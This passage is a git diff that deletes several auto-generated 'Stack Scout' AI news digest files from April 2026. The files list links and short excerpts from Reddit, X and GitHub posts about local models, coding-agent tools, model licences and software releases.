-Tags: mcp - -> This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally. I use Qwen3.5:27B-Q3\_K\_M on an RTX 4090 with a context length of \~200,000. I get \~40 tk/s and use about 22gb VRAM. I use it through the llama.cpp Web UI, with MCP tools enabled. Here are the tools I have provided it for web search/scrape: """ webmcp - MC - ---- - -## [Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT](https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/) -*TechCrunch AI* | Score: 1.00 -Tags: product_launch - ---- - -## [AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale](https://x.com/ainativedev/status/2031797311790260394) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale. - ---- - -## [@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For](https://x.com/hugobowne/status/2042464629214101663) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand. - ---- - -## [@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI](https://x.com/InfluxDB/status/2042388369674469612) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: tool_update - -> InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine. - ---- - -## [@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy](https://x.com/Techmeme/status/2042465278462955882) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: open_source - -> Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance. - ---- - -## [@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare](https://x.com/Berci/status/2042464294432858357) -*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 -Tags: developer_tool - -> China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally. - ---- - -## [96GB Vram. What to run in 2026?](https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: product_launch - -> I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? - ---- - -## [making my own ai waifu app that can teach me any language.](https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: api_update - -> using gemma-4-E4B-it for the llm her voice is using omnivoice tts that i made the api using fastapi 3d model made by me using vroid studio right now is support uploading image, search web, and using voice call and video call like grok ani. i'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model. - ---- - -## [Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?](https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense. # The core Idea is : Instead of relying on a small model (\~2B params) to generate code from scratch (which is usually weak), the agent would 1. search GitHub for relevant code 2. use that as a reference 3. copy + adapt existing implementations 4. generate minimal edits instead of full solutions So the model acts mo - ---- - -## [is Agentic Commerce just the next buzzword for let’s automate your bank account?](https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/) -*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 -Tags: agent_tool - -> Just saw this TechNode article claiming "AI agents" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline. We can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have "agents" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare. Think about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp - ---- - -## [Started a video series on building an orchestration layer for LLM post-training [P]](https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/) -*Reddit r/MachineLearning* | 10/04/2026 | Score: 1.00 -Tags: developer_tool - -> Hi everyone! Context, motivation, a lot of yapping, feel free to skip to TL;DR. A while back I posted here asking [\[D\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. At first I wasn't trying to build anything new. I mostly wanted to understand veRL p - ---- - diff --git a/data/digest-2026-04-11.md b/data/digest-2026-04-11.md deleted file mode 100644 index 3c2ca0b..0000000 --- a/data/digest-2026-04-11.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-11** | 15 stories | Auto-generated from 346 archived stories - ---- - -## [How I made my Claude multimodal — now I just feed it videos](https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: api_update, developer_tool - -> Claude + Qwen API Figured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action. Now I just drop a video straight into Claude and get back what I need. Packaged it as a plugin for easy setup. github.com/kirillbrsnkv/give-claude-eyes - ---- - -## [How to get Claude to run more autonomously](https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: api_update, tool_update - -> Hi! Can someone tell me how to get Claude to work more autonomously on a large task? A bit of context: I have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings. The application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. Also a lot of properties are nullable, but not explicitly. 3k warnings currently. Super tedious for a human - ---- - -## [update on my ai waifu app, can use web search react to images even picture of herself](https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances) using SerpApi for the web search the tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api) my ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag - ---- - -## [I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki](https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> If you run multiple agent CLIs daily, you've probably hit the same pain points I have: 1. Too many terminal windows — impossible to find the one you need 2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse 3. Sharing files between agents means manually copying everything into the project folder I looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b - ---- - -## [I automated most of my job](https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/) -*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 -Tags: api_update, cli_tool - -> I'm a software engineer with 11 yoe. I automated about 80% of my job with claude cli and a super simple dotnet console app. The workflow is super simple: 1. dotnet app calls our gitlab api for issues assigned to me 2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description 3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a - ---- - -## [I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it](https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.99 -Tags: api_update, cli_tool - -> Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago. So I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project. What it does fo - ---- - -## [I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out](https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.96 -Tags: open_source, cli_tool - -> Built with Claude Code, specifically for Claude Code users. Free, open source, MIT. What it does u/daik0z/claude-notify adds a Stop hook to \~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: "3 files edited · 2 commands ". npm install -g u/daik0z/claude-notify claude-notify setup What I learned from 374 downloads I sat down to stress-test it and foun - ---- - -## [ComfyUI workflow to fully python script?](https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 -Tags: api_update - -> Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python. Why? I'm planning to use a multi-GPU server and I want to optimize for that. What libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this? Also, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those? Thank you! - ---- - -## [Labs for Claude Certified Architect Foundations Exam](https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: tool_update - -> While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers. * Lab 01 - Customer Support Resolution Agent * Lab 02 - Code Generation Workflows * Lab 03 - Multi-Agent Research System * Lab 04 - Developer Productivity Agent * Lab 05 - CI/CD Integration * Lab 06 - Structured Data Extraction [https://github. - ---- - -## [FT - China’s Alibaba shifts towards revenue over open-source AI](https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: open_source - -> [https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t) Is it true? - ---- - -## [FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]](https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/) -*Reddit r/MachineLearning* | 11/04/2026 | Score: 1.00 -Tags: tool_update - -> I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch. The main goal is to make the progression across versions easier to understand from code. This is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details. - ---- - -## [I built a structured reasoning framework for Claude — because "good output" isn't enough](https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/) -*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 -Tags: developer_tool - -> **I built a structured reasoning framework for Claude — because "good output" isn't enough** I kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up. So I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled. The core idea: * Every complex task goes through a f - ---- - -## [Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)](https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: open_source - -> Posted here yesterday about the v1 cross-modal dataset. One of you suggested adding GCG adversarial suffixes and multi-turn attack coverage. That feedback turned into v2 and v3 being built and shipped within 24 hours. The dataset has gone from 47K to 62K samples. HuggingFace: https://huggingface.co/datasets/Bordair/bordair-multimodal GitHub: https://github.com/Josh-blythe/bordair-multimodal-v1/ MIT licensed. The repo's also picked up early interest from engineers at NVIDIA, PayPal, NetApp, and - ---- - -## [Gemma 4 - Going Mad - - - Help!!!](https://reddit.com/r/LocalLLaMA/comments/1siia1t/gemma_4_going_mad_help/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: cli_tool - -> Hi All Im getting up to speed on LLMs and we are looking at Gemma4. We are using a M3 Ultra with 512GB VRAM. So no dangers there. Im using opencode cli for these tests. However it doesnt appear to matter what I use the results are the same. Its all around tooling. I have re-downloaded all the models this morning post the fixes. These are the unsloth ones. Im running llama.cpp - which i build on the server and is bang up to date. So in opencode CLI - if i give it this prompt - its runs - ---- - -## [Curated 550+ free LLM tools for builders (APIs, local models, RAG, agents, IDEs)](https://reddit.com/r/LocalLLaMA/comments/1sigg35/curated_550_free_llm_tools_for_builders_apis/) -*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 -Tags: cli_tool - -> I spent the whole day putting together a big list of **free or cheap LLM tools** that are actually useful if you’re building stuff. Tried to focus more on **local models + dev tools** instead of those generic “1000 AI websites” type lists. It includes: • local models (Ollama, Qwen, Llama etc) • free LLM APIs (OpenRouter, Groq, Gemini etc) • coding IDEs + CLI tools (Cursor, Qwen Code, Gemini CLI etc) • RAG stack tools (vector DBs, embeddings, frameworks) • agent frameworks and automati - ---- - diff --git a/data/digest-2026-04-12.md b/data/digest-2026-04-12.md deleted file mode 100644 index 00cfb87..0000000 --- a/data/digest-2026-04-12.md +++ /dev/null @@ -1,83 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-12** | 10 stories | Auto-generated from 109 archived stories - ---- - -## [JARVIS running on 3 servers as one fleet. Claude Code, Cursor, and OpenCode all coordinating.](https://reddit.com/r/ClaudeAI/comments/1sj4o7y/jarvis_running_on_3_servers_as_one_fleet_claude/) -*Reddit r/ClaudeAI* | 12/04/2026 | Score: 1.00 -Tags: mcp, cli_tool, agent_tool - -> One instance is enough, but where is the fun in that right? 🤣 JARVIS across 3 servers, each running a different AI coding agent: \- Hel2: Claude Code CLI \- Hel1: Cursor CLI \- Mainframe: OpenCode They talk to each other over fleet MCP. Each has its own vector memory (Qdrant), runs its own tasks, and reports back to me on Telegram or work with each other from one point of contact. Same JARVIS, different hands. They don't just run. They coordinate. Video is all 3 tmux sessions open at o - ---- - -## [Openclaw real costs: self hosting vs managed hosting vs API fees](https://reddit.com/r/ChatGPT/comments/1sj6r9b/openclaw_real_costs_self_hosting_vs_managed/) -*Reddit r/ChatGPT* | 12/04/2026 | Score: 1.00 -Tags: api_update, open_source - -> Everyone says openclaw is free and open source but what's the real monthly cost when you add everything up? Hosting, API fees, whatever else. How much are people paying for self-hosting vs managed and is the price difference worth? - ---- - -## [OK I installed bitsandbytes but still getting error - Help please - thanks](https://reddit.com/r/StableDiffusion/comments/1sj1gi9/ok_i_installed_bitsandbytes_but_still_getting/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 -Tags: product_launch, cli_tool - -> Used terminal and installed it like so: pip install --force-reinstall [https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release\_main/bitsandbytes-1.33.7.preview-py3-none-win\_amd64.whl](https://github.com/bitsandbytes-foundation/bitsandbytes/releases/download/continuous-release_main/bitsandbytes-1.33.7.preview-py3-none-win_amd64.whl) Getting error and StableDiffusion does not run File "C:\\Users\\123\\Downloads\\StabilityMatrix-win-x64\\Data\\Packages\\ - ---- - -## [Meta released new paper : Neural Computers](https://reddit.com/r/LocalLLaMA/comments/1sj782l/meta_released_new_paper_neural_computers/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: cli_tool - -> What they wish to convey is can AI act like a computer? the team tried training a video model to generate simulation for terminal and desktop and got decent results. check more details : https://youtu.be/Evcgg-LG\_jA?si=0h0bnM7qUsqDcKCJ paper : https://arxiv.org/abs/2604.06425 - ---- - -## [Open source agent stack that actually works in 2026 (no hype)](https://reddit.com/r/LocalLLaMA/comments/1sj6ke6/open_source_agent_stack_that_actually_works_in/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: open_source - -> been running this setup for a few months and wanted to share what actually works vs whats just github stars hermes agent (24k stars, MIT) - runs on your own machine or vps, connects to telegram/discord/whatsapp, persistent memory stored locally in sqlite. your data doesnt leave your network. pair it with ollama and local models for fully offline operation. the memory layer is what separates it from everything else.. your agent on day 30 actually knows your projects and preferences everything c - ---- - -## [MiniMax M2.7 is NOT open source - DOA License :(](https://reddit.com/r/LocalLLaMA/comments/1sj2oqz/minimax_m27_is_not_open_source_doa_license/) -*Reddit r/LocalLLaMA* | 12/04/2026 | Score: 1.00 -Tags: open_source - -> Commercial use is banned without prior written permission from MiniMax. And their definition of "commercial" is broad - covers paid services, commercial APIs, and even deploying a fine-tuned version for profit. Military use is also explicitly prohibited- interesting. So you can't use the model or any outputs for anything commercial! I'm really starting to hate these "open weights, closed license" models... https://huggingface.co/MiniMaxAI/MiniMax-M2.7/blob/main/LICENSE - ---- - -## [Does LTX 2.3 have good motion transfer?](https://reddit.com/r/StableDiffusion/comments/1sj87tk/does_ltx_23_have_good_motion_transfer/) -*Reddit r/StableDiffusion* | 12/04/2026 | Score: 0.94 -Tags: open_source - -> What are the best open source motion transfer workflows and models right now? Is it still Wan + SCAIL? Or LTX 2.3 have a better one? - ---- - -## [This is so good](https://reddit.com/r/ClaudeAI/comments/1sj3icv/this_is_so_good/) -*Reddit r/ClaudeAI* | 12/04/2026 | Score: 0.86 -Tags: api_update - -> Claude code just created a whole gamified experience in the web. for my baby baby shower. Unique ids admin ui with count of RSVP the whole thing. All canvas over html in around 3 hrs because I tweaked a lot and also developed the whole api in c++ and published it to a domain created an AWS cloud front and managed to tied it to email sending. I’m officially wowed. - ---- - -## [It seems ChatGPT leaked a JSON response (including API enpoint)](https://reddit.com/r/ChatGPT/comments/1siyuyb/it_seems_chatgpt_leaked_a_json_response_including/) -*Reddit r/ChatGPT* | 12/04/2026 | Score: 0.86 -Tags: api_update - -> idk if this is visible in network requests, but chatgpt responded with \[Errno fetch [http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker\_convo2im](http://image-gen-service.openai.svc.cluster.local:8081/chatgpt/worker_convo2im) failed: 429: b'{\\n "error": {\\n "message": "You're generating images too quickly. To ensure the best experience for everyone, we have rate limits in place. Please wait for 9 minutes before generating more images.",\\n "type": "images",\\n "param": nul - ---- - -## [MiniMax M2.7 Is Now Open Source](https://firethering.com/minimax-m2-7-agentic-model/) -*Hacker News* | 12/04/2026 | Score: 0.74 -Tags: open_source - ---- - diff --git a/data/digest-2026-04-14.md b/data/digest-2026-04-14.md deleted file mode 100644 index 3c0afc1..0000000 --- a/data/digest-2026-04-14.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-14** | 15 stories | Auto-generated from 271 archived stories - ---- - -## [hands on workshop: context engineering for multi agent systems [D]](https://reddit.com/r/MachineLearning/comments/1skf122/hands_on_workshop_context_engineering_for_multi/) -*Reddit r/MachineLearning* | 13/04/2026 | Score: 1.00 -Tags: api_update, mcp, tool_update, agent_tool - -> hey everyone, sharing this because it's directly relevant to what a lot of people here are building. packt publishing is running a hands on workshop on april 25 on context engineering for multi agent systems with denis rothman. what gets covered: \- semantic blueprints for multi agent orchestration \- MCP integration for standardized agent tool use \- context window management across agents \- high fidelity RAG pipelines with verifiable citations \- safeguards against prompt injection and - ---- - -## [Docker sandbox templates for running Claude Code with a web/mobile UI (CloudCLI)](https://reddit.com/r/ClaudeAI/comments/1slld23/docker_sandbox_templates_for_running_claude_code/) -*Reddit r/ClaudeAI* | 14/04/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> I maintain CloudCLI, an open source web/mobile UI for AI Coding agents like Claude Code, Gemini and Codex (https://github.com/siteboon/claudecodeui if you are not aware) We recently added Docker Sandbox support and I wanted to share it here. The idea is simple, Docker sandbox allows you to run agents in an isolated environment and we've created a template to also add a webui on top of it and interact with your sandbox instead of a terminal. `npx @cloudcli-ai/cloudcli@latest sandbox ~/my-proje - ---- - -## [How to make Codex (or any agent) do your work without any instructions (it learns by watching you!). Open-source](https://reddit.com/r/ChatGPT/comments/1sljafu/how_to_make_codex_or_any_agent_do_your_work/) -*Reddit r/ChatGPT* | 14/04/2026 | Score: 1.00 -Tags: open_source, agent_tool - -> Hiii - here is a simple demo of how AgentHandover watches my screen and then instructs AI agent to do it like me without me explaining. AgentHandover watches how you work on your Mac, turns your workflows into reusable Skills, and lets agents like Codex, OpenClaw, etc. can execute them the way you do it by just typing /ah-skill-name and watch it do the magic. Each Skill captures the what, the why, and the how - steps, strategy, decision logic, guardrails, and your writing voice. And they're s - ---- - -## [pnpm v10.33.0 released](https://github.com/pnpm/pnpm/releases/tag/v10.33.0) -*GitHub Releases · pnpm* | 24/03/2026 | Score: 0.99 -Tags: developer_tool, cli_tool - -> ## Minor Changes * Added a new `dedupePeers` setting that reduces peer dependency duplication. When enabled, peer dependency suffixes use version-only identifiers (`name@version`) instead of full dep paths, eliminating nested suffixes like `(foo@1.0.0(bar@2.0.0))`. This dramatically reduces the number of package instances in projects with many recursive peer dependencies [#11070](https://github.com/pnpm/pnpm/issues/11070). ## Patch Changes * Fail on incompatible lockfiles in CI when - ---- - -## [Gemini CLI v0.37.2 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.37.2) -*GitHub Releases · Gemini CLI* | 13/04/2026 | Score: 0.92 -Tags: cli_tool, tool_update - -> ## What's Changed * fix(patch): cherry-pick 9d741ab to release/v0.37.1-pr-24565 to patch version v0.37.1 and create version 0.37.2 by @gemini-cli-robot in https://github.com/google-gemini/gemini-cli/pull/25322 **Full Changelog**: https://github.com/google-gemini/gemini-cli/compare/v0.37.1...v0.37.2 - ---- - -## [Turbo v2.9.6 released](https://github.com/vercel/turborepo/releases/tag/v2.9.6) -*GitHub Releases · Turbo* | 10/04/2026 | Score: 0.92 -Tags: github_release, tool_update - -> ## What's Changed ### create-turbo * chore: Update dependencies found in audits by @anthonyshew in https://github.com/vercel/turborepo/pull/12586 ### Examples * fix: Add missing `@types/node` to `with-svelte` example apps by @anthonyshew in https://github.com/vercel/turborepo/pull/12585 ### Changelog * docs: Add Bun equivalent for updating dependencies by @anthonyshew in https://github.com/vercel/turborepo/pul - ---- - -## [We're all building on top of something that changes under us every week, and nobody has a plan for that](https://reddit.com/r/ClaudeAI/comments/1sl3yzt/were_all_building_on_top_of_something_that/) -*Reddit r/ClaudeAI* | 14/04/2026 | Score: 0.90 -Tags: api_update, tool_update - -> I've been using Claude (Pro, now Max) for about 7 months, primarily for building and shipping small tools and automations for clients. I'm not complaining about Claude itself here , this is about a pattern I'm noticing across the entire AI tooling ecosystem that I think deserves a real conversation. Every week, something changes. A model gets updated and suddenly the same prompt that worked reliably for two months produces different output. An API response structure shifts slightly. A feature g - ---- - -## [Vercel CLI vercel@51.2.1 released](https://github.com/vercel/vercel/releases/tag/vercel%4051.2.1) -*GitHub Releases · Vercel CLI* | 14/04/2026 | Score: 0.84 -Tags: api_update, cli_tool - -> ### Patch Changes - Add `ai-gateway api-keys create` command for creating AI Gateway API keys with optional quota limits ([#15744](https://github.com/vercel/vercel/pull/15744)) - Improve `vercel blob list-stores` with `--json` and `--no-projects`, exclude non-blob stores when the API returns a `type` field, and show a richer table for non-TTY output while keeping linked-project filtering, `--all`, and interactive store selection on TTY. ([#14653](https://github.com/vercel/vercel/pull/14653 - ---- - -## [Gemini CLI v0.38.0 released](https://github.com/google-gemini/gemini-cli/releases/tag/v0.38.0) -*GitHub Releases · Gemini CLI* | 15/04/2026 | Score: 1.00 -Tags: cli_tool - -> ## What's Changed * fix(cli): refresh slash command list after /skills reload by @NTaylorMullen in https://github.com/google-gemini/gemini-cli/pull/24454 * Update README.md for links. by @g-samroberts in https://github.com/google-gemini/gemini-cli/pull/22759 * fix(core): ensure complete_task tool calls are recorded in chat history by @abhipatel12 in https://github.com/google-gemini/gemini-cli/pull/24437 * feat(policy): explicitly allow web_fetch in plan mode with ask_user by @Adib234 in https:// - ---- - -## [My first impressions of Minimax M2.7 (Q5_K_M) vs Qwen 3.5 27b (Q8_0)](https://reddit.com/r/LocalLLaMA/comments/1slm3si/my_first_impressions_of_minimax_m27_q5_k_m_vs/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: api_update - -> I'm not sure if the AesSedai's Q5\_K\_M version of Minimax M2.7 is too much lobotomized or if the model itself is kind of weak. I did a simple experiment with both models running with the recommended parameters. The task was simply to generate some [AGENTS.md](http://AGENTS.md) files for a Python/Fast API/LangGraph project of mine (Roo Code /init command), which has some degree of complexity. Minimax runs painfully slowly on my setup, so I was expecting it to demolish Qwen 3.5... but - ---- - -## [Refusal in open-weights models looks like a sparse gate -> amplifier circuit, and generalizes across 12 models from 6 labs (2B-72B)](https://reddit.com/r/LocalLLaMA/comments/1sllajh/refusal_in_openweights_models_looks_like_a_sparse/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Paper: [https://arxiv.org/abs/2604.04385](https://arxiv.org/abs/2604.04385) I've been trying to understand where refusal actually lives. How it works mechanistically. Arditi et al showed refusal can be steered with a single direction. What I looked at here is the mechanistic question: what circuit creates and amplifies that direction? Main result: Across 12 models from 6 labs, I keep finding a sparse **gate-amplifier** pattern. A mid-layer 'gate' attention head reads a detection-layer represe - ---- - -## [Tencent HY-World 2.0 appears to be dropping on April 15 — open-source multimodal 3D world generation from Tencent Hunyuan](https://reddit.com/r/StableDiffusion/comments/1sll638/tencent_hyworld_20_appears_to_be_dropping_on/) -*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Tencent’s Hunyuan team is apparently releasing **HY-World 2.0 tomorrow**, according to a teaser post from Tengfei Wang (Tencent Hunyuan): “Launching tomorrow — Tencent #HYWorld 2.0, an engine-ready World Model" [Source](https://x.com/DylanTFWang/status/2043952886166761519) The launch page is already live, and this looks like a major upgrade over HY-World 1.5 / WorldPlay. ## What HY-World 2.0 does HY-World 2.0 is a multimodal world model that can generate persistent, explorable 3D environments - ---- - -## [Updated Minimax m2.7 still doesn't allow coding a product. But before the next riot starts, Ryan Lee has already confirmed that they are still working on the license, and sale of products built by m2.7 is permitted.](https://reddit.com/r/LocalLLaMA/comments/1slkjqp/updated_minimax_m27_still_doesnt_allow_coding_a/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: tool_update - -> Reddit r/LocalLLaMA — 9 upvotes, 14 comments - ---- - -## [2x Asus Ascent GX10 - MiniMax M2.7 AWQ - cloud providers are dead to me](https://reddit.com/r/LocalLLaMA/comments/1sli7xr/2x_asus_ascent_gx10_minimax_m27_awq_cloud/) -*Reddit r/LocalLLaMA* | 14/04/2026 | Score: 1.00 -Tags: agent_tool - -> Hello, I've been on a quest to get something "close enough" of Opus 4.5 running locally, for agentic coding, as SWE with 15 years of experience. I tried with one spark (yeah I'm calling my Asus Ascent GX10 sparks - they're the same), with models like Qwen 3.5 122B-A10B, Qwen3-Coder-Next, M2.5-REAP, ... Nothing was scratching the itch, too much frustration. 128GB is simply not enough (for me) right now. So I bought a second one (first one I paid 2800€, second one 2500€, plus 60€ cable - total - ---- - -## [Parisians: we're running an open source AI art hackathon with LTX + NVIDIA this Saturday](https://reddit.com/r/StableDiffusion/comments/1slgzja/parisians_were_running_an_open_source_ai_art/) -*Reddit r/StableDiffusion* | 14/04/2026 | Score: 1.00 -Tags: open_source - -> Hack and train on H100s for a day w/ people from the open source community + reserachers. Full details [here](https://ados.events/hackathon) - ---- - diff --git a/data/digest-2026-04-15.md b/data/digest-2026-04-15.md deleted file mode 100644 index fd9b9a8..0000000 --- a/data/digest-2026-04-15.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-04-15** | 15 stories | Auto-generated from 418 archived stories - ---- - -## [Qwen Code v0.14.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.14.5) -*GitHub Releases · Qwen Code* | 15/04/2026 | Score: 1.00 -Tags: api_update, developer_tool, cli_tool - -> ## What's Changed * feat(cli/sdk): expose /context usage data in non-interactive mode and SDK API by @wenshao in https://github.com/QwenLM/qwen-code/pull/2916 * feat(cli): add startup performance profiler by @doudouOUC in https://github.com/QwenLM/qwen-code/pull/3232 * feat(core): implement fork subagent for context sharing by @wenshao in https://github.com/QwenLM/qwen-code/pull/2936 * feat(vscode-ide-companion): add /account for account display by @qqqys in https://github.com/QwenLM/qwen-code/p - ---- - -## [MCP vs API?](https://reddit.com/r/ClaudeAI/comments/1slr3qj/mcp_vs_api/) -*Reddit r/ClaudeAI* | 15/04/2026 | 